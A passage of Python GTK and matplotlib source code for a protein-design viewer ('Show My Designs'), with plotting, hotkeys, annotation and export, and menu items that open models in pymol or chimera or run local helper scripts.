search_buffer.connect('deleted-text', self.on_search_in_notes)
search_buffer.connect('inserted-text', self.on_search_in_notes)
vbox = gtk.VBox()
vbox.pack_start(self.search_form, False, True, 0)
vbox.pack_start(frame, True, True, 0)
return vbox
def setup_plot(self):
figure = Figure(facecolor='#edecea')
# Create the axes.
self.axes = figure.add_axes((0.15, 0.15, 0.75, 0.75))
self.axes.set_ylabel('Score')
# Create the canvas.
self.canvas = FigureCanvas(figure)
self.canvas.mpl_connect('pick_event', self.on_select_model)
self.canvas.mpl_connect('button_press_event', self.on_click_plot_mpl)
self.canvas.mpl_connect('motion_notify_event', self.on_move_mouse_mpl)
self.canvas.connect('button-press-event', self.on_click_plot_gtk)
self.canvas.set_size_request(-1, 350)
# Create the tool bar.
self.toolbar = NavigationToolbar(self.canvas, self)
# Place all the widgets.
self.mouse_position = gtk.Label("")
table = gtk.Table(3, 5)
table.attach(self.toolbar, 0, 1, 0, 3)
table.attach(self.mouse_position, 3, 4, 1, 2, xoptions=0, yoptions=0, xpadding=3)
vbox = gtk.VBox()
vbox.pack_start(self.canvas, True, True, 0)
vbox.pack_start(table, False, True, 0)
return vbox
def setup_filter_pane(self):
pane = FilterPane(self)
pane.connect('updated', lambda _: self.update_plot())
return pane
def setup_annotation_pane(self):
self.notes = gtk.TextView()
self.notes.set_wrap_mode(gtk.WRAP_WORD)
self.notes.set_size_request(-1, 100)
self.notes.set_left_margin(3)
self.notes.set_right_margin(3)
self.notes.set_pixels_above_lines(3)
self.notes.set_pixels_below_lines(3)
self.notes.set_cursor_visible(True)
self.notes.get_buffer().connect('changed', self.on_edit_annotation)
scroll_window = gtk.ScrolledWindow()
scroll_window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
scroll_window.add(self.notes)
frame = gtk.Frame()
frame.add(scroll_window)
return frame
def setup_metric_menu(self, callback=None, initial_choice=None):
try: self.metric_store
except AttributeError:
self.metric_store = gtk.ListStore(str, str)
for key in self.sorted_metrics:
metric = self.metrics[key]
self.metric_store.append([metric.name, metric.title])
cell = gtk.CellRendererText()
### previousoy ComboBox
menu = gtk.ComboBoxText(model=self.metric_store)
menu.pack_start(cell, True)
menu.add_attribute(cell, 'text', 1)
menu.set_active(0)
for i, metric in enumerate(self.sorted_metrics):
if metric == initial_choice:
menu.set_active(i)
if callback:
menu.connect('changed', callback)
return menu
def on_hotkey_press(self, widget, event):
key = gdk.keyval_name(event.keyval).lower()
if event.state & gdk.CONTROL_MASK: key = 'ctrl-' + key
if event.state & gdk.SHIFT_MASK: key = 'shift-' + key
hotkeys = {
'escape': self.normal_mode,
}
normal_mode_hotkeys = {
'i': self.insert_mode, 'a': self.insert_mode,
'z': self.zoom_mode,
'x': self.pan_mode,
'c': self.refocus_plot,
'tab': self.cycle_y_metric,
'space': self.cycle_x_metric,
'shift-tab': self.reverse_cycle_y_metric,
'shift-space': self.reverse_cycle_x_metric,
}
multi_design_hotkeys = {
'j': self.next_design, 'f': self.next_design,
'k': self.previous_design, 'd': self.previous_design,
'slash': self.search_mode,
}
keep_focus = (
gtk.Entry,
gtk.TextView,
gtk.Button,
gtk.ComboBox
)
if not isinstance(self.get_focus(), keep_focus):
hotkeys.update(normal_mode_hotkeys)
if len(self.designs) > 1:
hotkeys.update(multi_design_hotkeys)
if key in hotkeys:
hotkeys[key]()
return True
def on_search_in_notes(self, entry_buffer, *_):
self.update_designs()
def on_select_designs(self, selection):
new_keys = []
old_keys = self.keys[:]
self.keys = []
model, paths = selection.get_selected_rows()
for path in paths:
iter = model.get_iter(path)
key = model.get_value(iter, 0)
new_keys.append(key)
# Don't change the order of designs that were already selected. The
# order affects how the color of the design in the score vs rmsd plot,
# and things get confusing if it changes.
for key in old_keys:
if key in new_keys:
self.keys.append(key)
for key in new_keys:
if key not in self.keys:
self.keys.append(key)
# Rename the window based on the current selection.
subtitle = ""
if len(self.keys) == 1:
subtitle = " ({})".format(self.keys[0])
if len(self.keys) > 1:
subtitle = " ({}, ...)".format(self.keys[0])
self.set_title("Show My Designs" + subtitle)
# This is an efficiency thing. The 'J' and 'K' hotkeys works in two
# steps: first unselect everything and then select the next row in
# order. Redrawing the plot is expensive, so it's worthwhile to skip
# redrawing after that first step.
if self.keys:
self.update_plot()
self.update_annotations()
def on_select_model(self, event):
self.selected_model = event.ind[0], event.artist.design
def on_move_mouse_mpl(self, event):
if event.xdata is None or event.ydata is None:
# The data coordinates will be None only if the mouse is outside
# the data area.
self.mouse_position.set_text("")
else:
coord = '{:0.2f}, {:0.2f}'.format(event.xdata, event.ydata)
self.mouse_position.set_text(coord)
def on_click_plot_mpl(self, event):
pass
def on_click_plot_gtk(self, widget, event):
# Ignore any event that isn't a right button click or a left button
# click with the control key held down.
is_right_click = \
(event.button == 3) or \
(event.button == 1 and event.get_state() & gdk.CONTROL_MASK)
if not is_right_click: return
if self.toolbar._active == 'PAN': return
if self.toolbar._active == 'ZOOM': return
if self.selected_model is None: return
# Figure out which model was clicked.
index, design = self.selected_model
rep_index = design.representative
path = os.path.join(design.directory, design.paths[index])
rep_path = os.path.join(design.directory, design.paths[rep_index])
is_rep = (index == rep_index)
self.selected_model = None
# Search for scripts that can perform some action using the clicked
# model. Such scripts must have the `*.sho' suffix and may be located
# anywhere from the directory containing the models to any directory
# below that. Any scripts that are found will be used to populate a
# drop-down menu. If selected, the script will be called with sh as
# the interpreter and the path to the model as the singular argument.
directory = os.path.abspath(design.directory)
sho_scripts = []
while directory != os.path.abspath('/'):
sho_pattern = os.path.join(directory, '*.sho')
sho_scripts += glob.glob(sho_pattern)
directory = os.path.dirname(directory)
# Create and display the drop-down menu.
file_menu = gtk.Menu()
script_dict = {}
def menu_callback(obj):
try_to_run_command([script_dict[obj.get_label()], path,
rep_path])
for script in sho_scripts:
title = os.path.basename(os.path.splitext(script)[0])
title = title[0].upper() + title[1:]
title = title.replace('_', ' ')
item = gtk.MenuItem(title)
script_dict[item.get_label()] = script
item.connect('activate', menu_callback)
file_menu.append(item)
view_in_pymol = gtk.MenuItem("View model in pymol")
view_in_pymol.connect('activate',
lambda *args: try_to_run_command(['pymol', path]))
file_menu.append(view_in_pymol)
view_in_chimera = gtk.MenuItem("View model in chimera")
view_in_chimera.connect('activate',
lambda *args: try_to_run_command(['chimera', path]))
file_menu.append(view_in_chimera)
file_menu.append(gtk.SeparatorMenuItem())
copy_path = gtk.MenuItem("Copy path to model")
copy_path.connect('activate', self.on_copy_model_path, path)
file_menu.append(copy_path)
if index == design.representative:
choose_rep = gtk.MenuItem("Reset representative")
choose_rep.connect(
'activate', self.on_set_representative, design, None)
else:
choose_rep = gtk.MenuItem("Set as representative")
choose_rep.connect(
'activate', self.on_set_representative, design, index)
file_menu.append(choose_rep)
file_menu.foreach(lambda item: item.show())
### Added a 'none'
file_menu.popup(None, None, None, None, event.button, event.time)
def on_copy_model_path(self, widget, path):
import subprocess
xsel = subprocess.Popen(['xsel', '-pi'], stdin=subprocess.PIPE)
xsel.communicate(path)
def on_set_representative(self, widget, design, index):
design.representative = index
self.update_plot()
def on_edit_annotation(self, buffer):
assert len(self.keys) == 1
design = self.designs[self.keys[0]]
bounds = buffer.get_bounds()
design.notes = buffer.get_text(*bounds, True)
def on_change_x_metric(self, widget):
self.x_metric = widget.get_active_text()
self.update_plot()
def on_change_y_metric(self, widget):
self.y_metric = widget.get_active_text()
self.update_plot()
def on_toggle_model_list(self, widget):
if widget.get_active():
self.show_model_list()
else:
self.hide_model_list()
def on_toggle_filter_pane(self, widget):
if widget.get_active():
self.show_filter_pane()
else:
self.hide_filter_pane()
def on_toggle_annotation_pane(self, widget):
if widget.get_active():
self.show_annotation_pane()
else:
self.hide_annotation_pane()
def on_toggle_legend(self, widget):
if widget.get_active():
self.show_legend()
else:
self.hide_legend()
def on_toggle_representative(self, widget):
if widget.get_active():
self.show_representative()
else:
self.hide_representative()
def on_toggle_model_count(self, widget):
if widget.get_active():
self.show_model_count()
else:
self.hide_model_count()
def normal_mode(self):
self.set_focus(None)
if self.toolbar._active == 'PAN':
self.toolbar.pan()
if self.toolbar._active == 'ZOOM':
self.toolbar.zoom()
def insert_mode(self):
self.set_focus(self.notes)
def search_mode(self):
self.set_focus(self.search_form)
def zoom_mode(self):
self.toolbar.zoom()
def pan_mode(self):
self.toolbar.pan()
def refocus_plot(self):
self.toolbar.home()
self.normal_mode()
def next_design(self):
selection = self.view.get_selection()
model, paths = selection.get_selected_rows()
num_paths = model.iter_n_children(None)
if paths[-1][0] < model.iter_n_children(None) - 1:
for path in paths: selection.unselect_path(path)
selection.select_path(paths[-1][0] + 1)
self.view.scroll_to_cell(paths[-1][0] + 1)
def previous_design(self):
selection = self.view.get_selection()
model, paths = selection.get_selected_rows()
if paths[0][0] > 0:
for path in paths: selection.unselect_path(path)
selection.select_path(paths[0][0] - 1)
self.view.scroll_to_cell(paths[0][0] - 1)
def cycle_x_metric(self, step=1):
i = self.sorted_metrics.index(self.x_metric)
i = (i + step) % len(self.sorted_metrics)
if self.sorted_metrics[i] == self.y_metric:
i = (i + step) % len(self.sorted_metrics)
# Change the axis by programmatically selecting a new entry in the
# corresponding drop-down menu in the toolbar. This is incredibly
# roundabout (and it kinda breaks encapsulation, although I consider
# ModelViewer and ModelToolbar to be friends), but it's the only way I
# know to keep the drop-down menu in sync.
self.toolbar.x_axis_menu.set_active(i)
def cycle_y_metric(self, step=1):
i = self.sorted_metrics.index(self.y_metric)
i = (i + step) % len(self.sorted_metrics)
if self.sorted_metrics[i] == self.x_metric:
i = (i + step) % len(self.sorted_metrics)
# Change the axis by programmatically selecting a new entry in the
# corresponding drop-down menu in the toolbar. This is incredibly
# roundabout (and it kinda breaks encapsulation, although I consider
# ModelViewer and ModelToolbar to be friends), but it's the only way I
# know to keep the drop-down menu in sync.
self.toolbar.y_axis_menu.set_active(i)
def reverse_cycle_x_metric(self):
self.cycle_x_metric(-1)
def reverse_cycle_y_metric(self):
self.cycle_y_metric(-1)
def save_selected_paths(self):
chooser = gtk.FileChooserDialog(
"Save selected paths",
parent=self,
action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons=(
gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
chooser.set_current_folder(os.getcwd())
chooser.set_current_name('selected_paths.txt')
response = chooser.run()
if response == gtk.RESPONSE_OK:
selected_designs = [self.designs[key] for key in self.keys]
with open(chooser.get_filename(), 'w') as file:
file.writelines(
os.path.join(
design.directory,
design.paths[design.representative]) + '\n'
for design in selected_designs)
chooser.destroy()
def save_selected_funnels(self):
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
selected_designs = [self.designs[key] for key in self.keys]
chooser = gtk.FileChooserDialog(
"Save selected funnels",
parent=self,
action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons=(
gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
chooser.set_current_folder(os.getcwd())
chooser.set_current_name('selected_funnels.pdf')
response = chooser.run()
if response == gtk.RESPONSE_OK:
pdf = PdfPages(chooser.get_filename())
for index, design in enumerate(selected_designs):
plt.figure(figsize=(8.5, 11))
plt.suptitle(design.directory)
self.plot_models(plt.gca(), [design])
pdf.savefig()
plt.close()
pdf.close()
chooser.destroy()
def hide_model_list(self):
self.model_list.hide()
self.model_list_toggle.set_active(False)
if not self.filter_pane.props.visible:
self.sidebar.hide()
def show_model_list(self):
self.model_list.show()
self.model_list_toggle.set_active(True)
self.sidebar.show()
def toggle_model_list(self):
if self.model_list.props.visible:
self.hide_model_list()
else:
self.show_model_list()
def hide_filter_pane(self):
self.filter_pane.hide()
self.filter_pane_toggle.set_active(False)
if not self.model_list.props.visible:
self.sidebar.hide()
def show_filter_pane(self):
self.filter_pane.show()
self.filter_pane_toggle.set_active(True)
self.sidebar.show()
def toggle_filter_pane(self):
if self.filter_pane.props.visible:
self.hide_filter_pane()
else:
self.show_filter_pane()
def hide_annotation_pane(self):
self.annotation_pane.hide()
self.annotation_pane_toggle.set_active(False)
def show_annotation_pane(self):
self.annotation_pane.show()
self.annotation_pane_toggle.set_active(True)
def toggle_annotation_pane(self):
if self.annotation_pane.props.visible:
self.hide_annotation_pane()
else:
self.show_annotation_pane()
def hide_legend(self):
if self.is_legend_visible:
self.is_legend_visible = False
self.legend_toggle.set_active(False)
self.update_plot()
def show_legend(self):
if not self.is_legend_visible:
self.is_legend_visible = True
self.legend_toggle.set_active(True)
self.update_plot()
def hide_representative(self):
if self.is_representative_visible:
self.is_representative_visible = False
self.representative_toggle.set_active(False)
self.update_plot()
def show_representative(self):
if not self.is_representative_visible:
self.is_representative_visible = True
self.representative_toggle.set_active(True)
self.update_plot()
def toggle_legend(self):
if self.is_legend_visible:
self.hide_legend()
else:
self.show_legend()
def hide_model_count(self):
if self.is_model_count_visible:
self.is_model_count_visible = False
self.model_count_toggle.set_active(False)
self.update_plot()
def show_model_count(self):
if not self.is_model_count_visible:
self.is_model_count_visible = True
self.model_count_toggle.set_active(True)
self.update_plot()
def toggle_model_count(self):
if self.is_model_count_visible:
self.hide_model_count()
else:
self.show_model_count()
def plot_models(self, axes, designs, **kwargs):
from itertools import count
labels = kwargs.get('labels', None)
x_metric = kwargs.get('x_metric', self.x_metric)
y_metric = kwargs.get('y_metric', self.y_metric)
# Define the colors that the plot will use.
red = '#ef2929', '#cc0000', '#a40000'
orange = '#fcaf3e', '#f57900', '#ce5c00'
yellow = '#fce94f', '#edd400', '#c4a000'
green = '#8ae234', '#73d216', '#4e9a06'
blue = '#729fcf', '#3465a4', '#204a87'
purple = '#ad7fa8', '#75507b', '#5c3566'
brown = '#e9b96e', '#c17d11', '#8f5902'
grey = '#2e3436', '#555753', '#888a85', '#babdb6', '#d3d7cf', '#eeeeec'
def color_from_cycle(index): #
cycle = (blue[1], red[1], green[2], orange[1], purple[1], brown[1],
blue[0], red[0], green[1], orange[0], purple[0], brown[0])
return cycle[index % len(cycle)]
# Clear the axes and reset the axis labels
axes.clear()
axes.set_xlabel(self.metrics[x_metric].title)
axes.set_ylabel(self.metrics[y_metric].title)
# Plot the two axes.
for index, design in enumerate(designs):
rep = design.representative
color = color_from_cycle(index)
label = labels[index] if labels is not None else ''
action = self.filter_pane.get_action()
keep, drop = self.filter_pane.get_masks(design)
x = design.get_metric(x_metric)
y = design.get_metric(y_metric)
# Scale the size of the points by the number of points.
size = np.clip(7500 / max(len(x), 1), 2, 15)
# Highlight the representative model.
if self.is_representative_visible and keep[rep]:
axes.scatter(
[x[rep]], [y[rep]],
s=60, c=yellow[1], marker='o', edgecolor='none',
label='_nolabel_')
# Highlight the filtered points, if that's what the user wants.
if action == 'highlight':
axes.scatter(
x[drop], y[drop],
s=size, c=grey[4], marker='o', edgecolor='none',
label='_nolabel_')
# Draw the whole score vs distance plot.
lines = axes.scatter(
x[keep], y[keep],
s=size, c=color, marker='o', edgecolor='none',
label=label, picker=True)
lines.paths = design.paths
lines.design = design
# Pick the axis limits based on the range of every design. This is done
# so you can scroll though every design without the axes changing size.
def get_metric_limits(metric, current_design=False): #
# Testing: Can we get metric limit of current only?
if current_design:
try:
values = np.concatenate([x.get_metric(metric) for x
in designs])
except Exception as e:
print('EXCEPT..')
print(e)
values = np.concatenate([x.get_metric(metric) for x in self])
# Default code
else:
values = np.concatenate([x.get_metric(metric) for x in self])
return self.metrics[metric].limits(values)
x_min, x_max = get_metric_limits(x_metric)
y_min, y_max = get_metric_limits(y_metric, current_design=not
self.normalize_to_all)
x_pad = 0.05 * (x_max - x_min)
y_pad = 0.05 * (y_max - y_min)
axes.set_ylim(
bottom=y_min - y_pad,
top=y_max + y_pad,
)
axes.set_xlim(
left=x_min - x_pad,
right=x_max + x_pad,
)
# Draw guides for axes the that have them.
x_guide = self.metrics[self.x_metric].guide
y_guide = self.metrics[self.y_metric].guide
if x_guide is not None:
axes.axvline(x_guide, color=grey[3], linestyle='--')
if y_guide is not None:
axes.axhline(y_guide, color=grey[3], linestyle='--')
# Draw the legend if the user enabled it.
if self.is_legend_visible:
axes.legend(loc='upper right')
if self.is_model_count_visible:
axes.annotate(
', '.join(str(len(x)) for x in designs),
xy=(0, 1), xycoords='axes fraction',
xytext=(8, -8), textcoords='offset points',
verticalalignment='top',
)
def update_everything(self):
self.update_annotations()
self.update_plot()
self.update_designs()
def update_plot(self):
designs = [self.designs[k] for k in self.keys]
self.plot_models(self.axes, designs, labels=self.keys)
self.canvas.draw()
def update_annotations(self):
if len(self.keys) == 1:
design = self.designs[self.keys[0]]
self.notes.get_buffer().set_text(design.notes)
self.notes.set_sensitive(True)
else:
self.notes.set_sensitive(False)
def update_designs(self):
model = self.view.get_model()
selector = self.view.get_selection()
model.clear()
def query_matches_design(design):
needle = self.search_form.get_text()
haystack = design.notes
if needle.islower():
haystack = haystack.lower()
return needle in haystack
for key in sorted(self.designs):
if query_matches_design(self.designs[key]):
model.append([key])
selector.select_path((0,))
class ShowMyViolins (gtk.Window):
def __init__(self, designs):
# Setup the parent class.
gtk.Window.__init__(self)
self.add_events(gdk.EventMask.KEY_PRESS_MASK)
self.connect('key-press-event', self.on_hotkey_press)
self.set_icon_from_file(os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'icon.png'))
# Setup the data members.
self.designs = designs
self.keys = list()
self.selected_model = None
self.is_legend_visible = False
self.is_representative_visible = False
self.is_model_count_visible = False
self.metrics = {
k: next(iter(self)).metrics[k] \
for k in set.intersection(*[set(x.metrics) for x in self])
}
print(self.metrics)
self.sorted_metrics = sorted(
self.metrics,
key=lambda k: (self.metrics[k].order, self.metrics[k].title)
)
print(self.sorted_metrics)
self.x_metric = (
default_x_metric
if default_x_metric in self.metrics
else self.sorted_metrics[0])
self.y_metric = (
default_y_metric
if default_y_metric in self.metrics
else self.sorted_metrics[1])
# Setup the GUI.
self.connect('destroy', lambda x: gtk.main_quit())
self.set_default_size(int(1.618 * 630), 630)
menu_bar = self.setup_menu_bar()
model_viewer = self.setup_model_viewer()
vbox = gtk.VBox()
vbox.pack_start(menu_bar, False)
vbox.pack_end(model_viewer, True)
self.add(vbox)
self.set_border_width(3)
self.update_everything()
self.show_all()
self.set_focus(None)
n = len(self.designs)
self.hide_model_list() if n == 1 else self.show_model_list()
self.hide_filter_pane()
self.show_annotation_pane()
self.hide_legend()
self.show_representative()
self.hide_model_count()
def __iter__(self):
return iter(list(self.designs.values()))
def setup_menu_bar(self):
bar = gtk.MenuBar()
# The "File" menu:
menu = gtk.Menu()
item = gtk.MenuItem("_File")
item.set_submenu(menu)
bar.append(item)
item = gtk.MenuItem("Save selected paths")
item.connect('activate', lambda _: self.save_selected_paths())
menu.append(item)
item = gtk.MenuItem("Save selected funnels")
item.connect('activate', lambda _: self.save_selected_funnels())
menu.append(item)
# The "View" menu:
menu = gtk.Menu()
item = gtk.MenuItem("_View")
item.set_submenu(menu)
bar.append(item)
item = self.model_list_toggle = gtk.CheckMenuItem("Model list")
item.connect('activate', self.on_toggle_model_list)
menu.append(item)
item = self.filter_pane_toggle = gtk.CheckMenuItem("Filter pane")
item.connect('activate', self.on_toggle_filter_pane)
menu.append(item)
item = self.annotation_pane_toggle = gtk.CheckMenuItem("Annotation pane")
item.connect('activate', self.on_toggle_annotation_pane)
menu.append(item)
item = gtk.SeparatorMenuItem()
menu.append(item)
item = self.legend_toggle = gtk.CheckMenuItem("Legend")
item.connect('activate', self.on_toggle_legend)
menu.append(item)
item = self.representative_toggle = gtk.CheckMenuItem("Representative")
item.connect('activate', self.on_toggle_representative)
menu.append(item)
item = self.model_count_toggle = gtk.CheckMenuItem("Model count")
item.connect('activate', self.on_toggle_model_count)
menu.append(item)
return bar
def setup_model_viewer(self):
plot = self.setup_plot()
self.model_list = self.setup_model_list()
self.filter_pane = self.setup_filter_pane()
self.annotation_pane = self.setup_annotation_pane()
self.sidebar = gtk.VPaned()
self.sidebar.add1(self.model_list)
self.sidebar.add2(self.filter_pane)
bottombar = gtk.VPaned()
bottombar.add1(plot)
bottombar.add2(self.annotation_pane)
viewer = gtk.HPaned()
viewer.add1(self.sidebar)
viewer.add2(bottombar)
return viewer
def setup_model_list(self):
list_store = gtk.ListStore(str)
text = gtk.CellRendererText()
icon = gtk.CellRendererPixbuf()
self.view = gtk.TreeView(list_store)
self.view.set_model(list_store)
self.view.set_rubber_banding(True)
self.view.set_enable_search(False)
self.view.set_headers_visible(False)
columns = [
('Name', 'directory'),
]
for index, parameters in enumerate(columns):
title, attr = parameters
def cell_data_func(column, cell, model, iter, attr): #
key = model.get_value(iter, 0)
design = self.designs[key]
text = getattr(design, attr)
cell.set_property('text', text)
def sort_func(model, iter_1, iter_2, attr): #
key_1 = model.get_value(iter_1, 0)
key_2 = model.get_value(iter_2, 0)
design_1 = self.designs[key_1]
design_2 = self.designs[key_2]
value_1 = getattr(design_1, attr)
value_2 = getattr(design_2, attr)
return cmp(value_1, value_2)
list_store.set_sort_func(index, sort_func, attr);
column = gtk.TreeViewColumn(title, text)
column.set_cell_data_func(text, cell_data_func, attr)
column.set_sort_column_id(index)
self.view.append_column(column)
selector = self.view.get_selection()
selector.connect("changed", self.on_select_designs)
### If selection is weird, double check this!
### gtk.SelectionMode(3) should correspond to GTK_SELECTION_MULTIPLE
selector.set_mode(gtk.SelectionMode(3))
scroller = gtk.ScrolledWindow()
scroller.set_policy(gtk.PolicyType.AUTOMATIC,
gtk.PolicyType.AUTOMATIC)
scroller.add(self.view)
frame = gtk.Frame()
frame.add(scroller)
self.search_form = gtk.Entry()
self.search_form.set_icon_from_stock(gtk.EntryIconPosition.SECONDARY, gtk.STOCK_FIND)
search_buffer = self.search_form.get_buffer()
search_buffer.connect('deleted-text', self.on_search_in_notes)
search_buffer.connect('inserted-text', self.on_search_in_notes)
vbox = gtk.VBox()
vbox.pack_start(self.search_form, False, True, 0)
vbox.pack_start(frame, True, True, 0)
return vbox
def setup_plot(self):
figure = Figure(facecolor='#edecea')
# Create the axes.
self.axes = figure.add_axes((0.15, 0.15, 0.75, 0.75))
self.axes.set_ylabel('Score')
# Create the canvas.
self.canvas = FigureCanvas(figure)
self.canvas.mpl_connect('pick_event', self.on_select_model)
self.canvas.mpl_connect('button_press_event', self.on_click_plot_mpl)
self.canvas.mpl_connect('motion_notify_event', self.on_move_mouse_mpl)
self.canvas.connect('button-press-event', self.on_click_plot_gtk)
self.canvas.set_size_request(-1, 350)
# Create the tool bar.
self.toolbar = NavigationToolbar(self.canvas, self)
# Place all the widgets.
self.mouse_position = gtk.Label("")
table = gtk.Table(3, 5)
table.attach(self.toolbar, 0, 1, 0, 3)
table.attach(self.mouse_position, 3, 4, 1, 2, xoptions=0, yoptions=0, xpadding=3)
vbox = gtk.VBox()
vbox.pack_start(self.canvas, True, True, 0)
vbox.pack_start(table, False, True, 0)
return vbox
def setup_filter_pane(self):
pane = FilterPane(self)
pane.connect('updated', lambda _: self.update_plot())
return pane
def setup_annotation_pane(self):
self.notes = gtk.TextView()
self.notes.set_wrap_mode(gtk.WRAP_WORD)
self.notes.set_size_request(-1, 100)
self.notes.set_left_margin(3)
self.notes.set_right_margin(3)
self.notes.set_pixels_above_lines(3)
self.notes.set_pixels_below_lines(3)
self.notes.set_cursor_visible(True)
self.notes.get_buffer().connect('changed', self.on_edit_annotation)
scroll_window = gtk.ScrolledWindow()
scroll_window.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
scroll_window.add(self.notes)
frame = gtk.Frame()
frame.add(scroll_window)
return frame
def setup_metric_menu(self, callback=None, initial_choice=None):
try: self.metric_store
except AttributeError:
self.metric_store = gtk.ListStore(str, str)
for key in self.sorted_metrics:
metric = self.metrics[key]
self.metric_store.append([metric.name, metric.title])
cell = gtk.CellRendererText()
### previousoy ComboBox
menu = gtk.ComboBoxText(model=self.metric_store)
menu.pack_start(cell, True)
menu.add_attribute(cell, 'text', 1)
menu.set_active(0)
for i, metric in enumerate(self.sorted_metrics):
if metric == initial_choice:
menu.set_active(i)
if callback:
menu.connect('changed', callback)
return menu
def on_hotkey_press(self, widget, event):
key = gdk.keyval_name(event.keyval).lower()
if event.state & gdk.CONTROL_MASK: key = 'ctrl-' + key
if event.state & gdk.SHIFT_MASK: key = 'shift-' + key
hotkeys = {
'escape': self.normal_mode,
}
normal_mode_hotkeys = {
'i': self.insert_mode, 'a': self.insert_mode,
'z': self.zoom_mode,
'x': self.pan_mode,
'c': self.refocus_plot,
'tab': self.cycle_y_metric,
'space': self.cycle_x_metric,
'shift-tab': self.reverse_cycle_y_metric,
'shift-space': self.reverse_cycle_x_metric,
}
multi_design_hotkeys = {
'j': self.next_design, 'f': self.next_design,
'k': self.previous_design, 'd': self.previous_design,
'slash': self.search_mode,
}
keep_focus = (
gtk.Entry,
gtk.TextView,
gtk.Button,
gtk.ComboBox
)
if not isinstance(self.get_focus(), keep_focus):
hotkeys.update(normal_mode_hotkeys)
if len(self.designs) > 1:
hotkeys.update(multi_design_hotkeys)
if key in hotkeys:
hotkeys[key]()
return True
def on_search_in_notes(self, entry_buffer, *_):
self.update_designs()
def on_select_designs(self, selection):
new_keys = []
old_keys = self.keys[:]
self.keys = []
model, paths = selection.get_selected_rows()
for path in paths:
iter = model.get_iter(path)
key = model.get_value(iter, 0)
new_keys.append(key)
# Don't change the order of designs that were already selected. The
# order affects how the color of the design in the score vs rmsd plot,
# and things get confusing if it changes.
for key in old_keys:
if key in new_keys:
self.keys.append(key)
for key in new_keys:
if key not in self.keys:
self.keys.append(key)
# Rename the window based on the current selection.
subtitle = ""
if len(self.keys) == 1:
subtitle = " ({})".format(self.keys[0])
if len(self.keys) > 1:
subtitle = " ({}, ...)".format(self.keys[0])
self.set_title("Show My Designs" + subtitle)
# This is an efficiency thing. The 'J' and 'K' hotkeys works in two
# steps: first unselect everything and then select the next row in
# order. Redrawing the plot is expensive, so it's worthwhile to skip
# redrawing after that first step.
if self.keys:
self.update_plot()
self.update_annotations()
def on_select_model(self, event):
self.selected_model = event.ind[0], event.artist.design
def on_move_mouse_mpl(self, event):
if event.xdata is None or event.ydata is None:
# The data coordinates will be None only if the mouse is outside
# the data area.
self.mouse_position.set_text("")
else:
coord = '{:0.2f}, {:0.2f}'.format(event.xdata, event.ydata)
self.mouse_position.set_text(coord)
def on_click_plot_mpl(self, event):
pass
def on_click_plot_gtk(self, widget, event):
# Ignore any event that isn't a right button click or a left button
# click with the control key held down.
is_right_click = \
(event.button == 3) or \
(event.button == 1 and event.get_state() & gdk.CONTROL_MASK)
if not is_right_click: return
if self.toolbar._active == 'PAN': return
if self.toolbar._active == 'ZOOM': return
if self.selected_model is None: return
# Figure out which model was clicked.
index, design = self.selected_model
rep_index = design.representative
path = os.path.join(design.directory, design.paths[index])
rep_path = os.path.join(design.directory, design.paths[rep_index])
is_rep = (index == rep_index)
self.selected_model = None
# Search for scripts that can perform some action using the clicked
# model. Such scripts must have the `*.sho' suffix and may be located
# anywhere from the directory containing the models to any directory
# below that. Any scripts that are found will be used to populate a
# drop-down menu. If selected, the script will be called with sh as
# the interpreter and the path to the model as the singular argument.
directory = os.path.abspath(design.directory)
sho_scripts = []
while directory != os.path.abspath('/'):
sho_pattern = os.path.join(directory, '*.sho')
sho_scripts += glob.glob(sho_pattern)
directory = os.path.dirname(directory)
# Create and display the drop-down menu.
file_menu = gtk.Menu()
script_dict = {}
def menu_callback(obj):
try_to_run_command([script_dict[obj.get_label()], path,
rep_path])
for script in sho_scripts:
title = os.path.basename(os.path.splitext(script)[0])
title = title[0].upper() + title[1:]
title = title.replace('_', ' ')
item = gtk.MenuItem(title)
script_dict[item.get_label()] = script
item.connect('activate', menu_callback)
file_menu.append(item)
view_in_pymol = gtk.MenuItem("View model in pymol")
view_in_pymol.connect('activate',
lambda *args: try_to_run_command(['pymol', path]))
file_menu.append(view_in_pymol)
view_in_chimera = gtk.MenuItem("View model in chimera")
view_in_chimera.connect('activate',
lambda *args: try_to_run_command(['chimera', path]))
file_menu.append(view_in_chimera)
file_menu.append(gtk.SeparatorMenuItem())
copy_path = gtk.MenuItem("Copy path to model")
copy_path.connect('activate', self.on_copy_model_path, path)
file_menu.append(copy_path)
if index == design.representative:
choose_rep = gtk.MenuItem("Reset representative")
choose_rep.connect(
'activate', self.on_set_representative, design, None)
else:
choose_rep = gtk.MenuItem("Set as representative")
choose_rep.connect(
'activate', self.on_set_representative, design, index)
file_menu.append(choose_rep)
file_menu.foreach(lambda item: item.show())
### Added a 'none'
file_menu.popup(None, None, None, None, event.button, event.time)
def on_copy_model_path(self, widget, path):
import subprocess
xsel = subprocess.Popen(['xsel', '-pi'], stdin=subprocess.PIPE)
xsel.communicate(path)
def on_set_representative(self, widget, design, index):
design.representative = index
self.update_plot()
def on_edit_annotation(self, buffer):
assert len(self.keys) == 1
design = self.designs[self.keys[0]]
bounds = buffer.get_bounds()
design.notes = buffer.get_text(*bounds)
def on_change_x_metric(self, widget):
self.x_metric = widget.get_active_text()
self.update_plot()
def on_change_y_metric(self, widget):
self.y_metric = widget.get_active_text()
self.update_plot()
def on_toggle_model_list(self, widget):
if widget.get_active():
self.show_model_list()
else:
self.hide_model_list()
def on_toggle_filter_pane(self, widget):
if widget.get_active():
self.show_filter_pane()
else:
self.hide_filter_pane()
def on_toggle_annotation_pane(self, widget):
if widget.get_active():
self.show_annotation_pane()
else:
self.hide_annotation_pane()
def on_toggle_legend(self, widget):
if widget.get_active():
self.show_legend()
else:
self.hide_legend()
def on_toggle_representative(self, widget):
if widget.get_active():
self.show_representative()
else:
self.hide_representative()
def on_toggle_model_count(self, widget):
if widget.get_active():
self.show_model_count()
else:
self.hide_model_count()
def normal_mode(self):
self.set_focus(None)
